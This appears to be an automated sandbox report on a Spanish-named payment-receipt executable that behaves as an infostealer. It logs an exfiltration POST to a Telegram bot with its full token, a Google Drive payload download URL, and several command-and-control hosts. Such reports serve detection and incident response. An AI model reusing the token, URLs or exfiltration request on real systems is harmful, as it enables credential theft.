            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f5b7140c899Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 17:29:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2046362099.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: Justificante pago-09453256434687.exe, Justificante pago-09453256434687.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2935464075.0000000020E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO
            Source: msiexec.exe, 00000006.00000003.2194212584.0000000005F3A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2924097464.0000000005F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=downloadU
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=downloadc
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exeJump to dropped file
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_00406BFE0_2_00406BFE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_030753626_2_03075362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307D2786_2_0307D278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307C1476_2_0307C147
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307C7386_2_0307C738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307C4686_2_0307C468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307CA086_2_0307CA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307E9886_2_0307E988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307CFAC6_2_0307CFAC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03073E096_2_03073E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307CCD86_2_0307CCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_030771186_2_03077118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307F9746_2_0307F974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0307E97C6_2_0307E97C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_030729EC6_2_030729EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03079DE06_2_03079DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A529686_2_21A52968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A59C186_2_21A59C18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5FC686_2_21A5FC68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A517A06_2_21A517A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A593286_2_21A59328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A50B306_2_21A50B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A51E806_2_21A51E80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5D9A86_2_21A5D9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5D9996_2_21A5D999
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5DDF16_2_21A5DDF1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5D5406_2_21A5D540
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A595486_2_21A59548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5D5506_2_21A5D550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5CCA06_2_21A5CCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5CC8F6_2_21A5CC8F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5D0E86_2_21A5D0E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5D0F86_2_21A5D0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A550286_2_21A55028
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5F8056_2_21A5F805
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5F8106_2_21A5F810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A500126_2_21A50012
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A550186_2_21A55018
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A500406_2_21A50040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A58BA06_2_21A58BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5F3A86_2_21A5F3A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5F3B86_2_21A5F3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5178F6_2_21A5178F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A58B916_2_21A58B91
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A50B206_2_21A50B20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5EB086_2_21A5EB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5EF606_2_21A5EF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5EF516_2_21A5EF51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5E6A06_2_21A5E6A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5E6B06_2_21A5E6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5EAF86_2_21A5EAF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5DE006_2_21A5DE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A51E706_2_21A51E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5E2576_2_21A5E257
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21A5E2586_2_21A5E258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240181D06_2_240181D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24017B786_2_24017B78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401B7A86_2_2401B7A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24018FB06_2_24018FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240130086_2_24013008
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401DC196_2_2401DC19
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401FC186_2_2401FC18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240160246_2_24016024
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401DC286_2_2401DC28
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401BC2A6_2_2401BC2A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240160306_2_24016030
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401BC386_2_2401BC38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240100406_2_24010040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240134506_2_24013450
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240134606_2_24013460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240164786_2_24016478
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240164886_2_24016488
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240104986_2_24010498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401E0A76_2_2401E0A7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401C0B76_2_2401C0B7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401E0B86_2_2401E0B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240138B86_2_240138B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401C0C86_2_2401C0C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240108F06_2_240108F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401A9286_2_2401A928
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401A9386_2_2401A938
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401E5386_2_2401E538
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401C5486_2_2401C548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401E5486_2_2401E548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24010D486_2_24010D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401C5586_2_2401C558
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401119F6_2_2401119F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240111A06_2_240111A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401E9C86_2_2401E9C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401C9D86_2_2401C9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401E9D86_2_2401E9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240115E86_2_240115E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401C9E86_2_2401C9E8
